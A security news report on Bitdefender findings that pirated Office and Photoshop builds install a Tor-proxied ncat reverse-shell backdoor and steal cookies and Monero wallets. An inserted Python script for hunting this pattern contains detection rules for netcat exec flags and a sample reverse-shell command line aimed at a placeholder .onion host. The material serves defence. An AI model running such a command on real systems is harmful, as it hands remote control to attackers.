Bitdefender researchers warn that cracked copies of Microsoft Office and Adobe Photoshop steal browser cookies and Monero cryptocurrency wallet data from the users who install the pirated software.
According to the researchers, some pirated builds of both programs come “equipped” with malware that first disables the firewall and opens a backdoor on the target machine, then steals browser session cookies (in the case of Firefox, typically the entire user profile, browsing history included), hijacks Monero cryptocurrency wallets and exfiltrates other data via BitTorrent.
Once launched, the cracked program drops an instance of ncat.exe (the legitimate Nmap utility for sending raw data over the network), a batch file named chknap.bat, and a Tor proxy.
“These tools work together to create a powerful backdoor that communicates with the C&C server over Tor: the ncat binary listens on the Tor proxy port (--proxy 127.0.0.1:9075) and uses the --exec option to send all input from the client to the application, and the responses are sent back to the client via the socket (normal reverse shell behavior),” the researchers said.
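As an added example that is not part of the Bitdefender writeup or of this article, the following Python snippet shows the kind of hunting check a defender would run over process-creation telemetry for the pattern just quoted: a netcat binary handing a program to the socket with --exec, proxied through a local Tor SOCKS port, launched from chknap.bat. The event dictionaries are constructed sample input in Sysmon Event ID 1 style, the .onion hostname is a placeholder, and the extra ports 9050 and 9150 (Tor's default SOCKS ports) and the netcat file names other than ncat.exe are assumptions of mine beyond what the page states.

```python
"""Hunt process-creation telemetry for the ncat-over-Tor backdoor pattern."""
import re
from dataclasses import dataclass, field

# 9075 is the port named in the Bitdefender writeup; 9050/9150 are Tor's
# default SOCKS ports (assumption: operators could just as well use defaults).
TOR_SOCKS_PORTS = {9075, 9050, 9150}

# ncat.exe is the name from the report; the others are common netcat builds (assumption).
NCAT_NAMES = {"ncat.exe", "ncat64.exe", "nc.exe", "nc64.exe", "netcat.exe"}

# ncat options that wire a program to the socket (reverse/bind shell behaviour).
EXEC_FLAGS = re.compile(r"(?<!\S)(--exec|--sh-exec|--lua-exec|-e|-c)(?=\s|=)")
# --proxy host:port (does not match --proxy-type because of the [ =] requirement).
PROXY_FLAG = re.compile(r"(?<!\S)--proxy[ =]([\w.\-]+):(\d+)")


@dataclass
class Finding:
    pid: int
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # A lone --proxy to a Tor port is weak evidence on its own; two or
        # more independent indicators on one process is what we escalate.
        return "high" if len(self.reasons) >= 2 else "low"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict) -> Finding:
    """Return a Finding; its reasons list is empty for benign events."""
    reasons = []
    cmd = event.get("command_line", "")
    img = basename(event.get("image", ""))
    parent_cmd = event.get("parent_command_line", "").lower()

    if img in NCAT_NAMES and EXEC_FLAGS.search(cmd):
        reasons.append("ncat-exec")        # netcat handing a program to the socket

    m = PROXY_FLAG.search(cmd)
    if m and m.group(1) in ("127.0.0.1", "localhost") and int(m.group(2)) in TOR_SOCKS_PORTS:
        reasons.append("tor-proxy")        # traffic routed through a local Tor SOCKS port

    if "chknap.bat" in parent_cmd:
        reasons.append("chknap-launcher")  # spawned by the batch file named in the report

    return Finding(pid=event["pid"], reasons=reasons)


def hunt(events):
    """Return only the events that tripped at least one indicator."""
    return [f for f in (analyse_event(e) for e in events) if f.reasons]


# Constructed sample events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {   # backdoor: ncat bridging cmd.exe to a socket via the local Tor SOCKS proxy
        "pid": 4120,
        "image": r"C:\Users\Public\ncat.exe",
        "command_line": r"ncat.exe --exec cmd.exe --proxy 127.0.0.1:9075 --proxy-type socks5 example.onion 443",
        "parent_command_line": r"C:\Windows\System32\cmd.exe /c C:\Users\Public\chknap.bat",
    },
    {   # benign: an admin port check with ncat, no --exec, no proxy
        "pid": 4121,
        "image": r"C:\Program Files (x86)\Nmap\ncat.exe",
        "command_line": r"ncat.exe -zv fileserver.corp.example 445",
        "parent_command_line": r"C:\Windows\System32\cmd.exe",
    },
    {   # ambiguous: curl through a local Tor port, no shell handed to the socket
        "pid": 4122,
        "image": r"C:\Windows\System32\curl.exe",
        "command_line": r"curl.exe --proxy 127.0.0.1:9050 https://check.torproject.org/",
        "parent_command_line": r"C:\Windows\System32\cmd.exe",
    },
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid={f.pid} severity={f.severity} reasons={', '.join(f.reasons)}")
```

Against the constructed sample, only the ncat process scores high (all three indicators), the curl process is reported as low because a local SOCKS proxy alone is not evidence of a shell, and the plain port check is not reported at all. In practice the same three predicates translate directly into an EDR or SIEM query over process-creation events.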
The operators behind this campaign spend a considerable amount of time examining each compromised environment before deciding what is worth stealing. The analysts believe the theft of the entire Firefox profile was more incidental than targeted: any other browser installed on the device would have served the attackers just as well.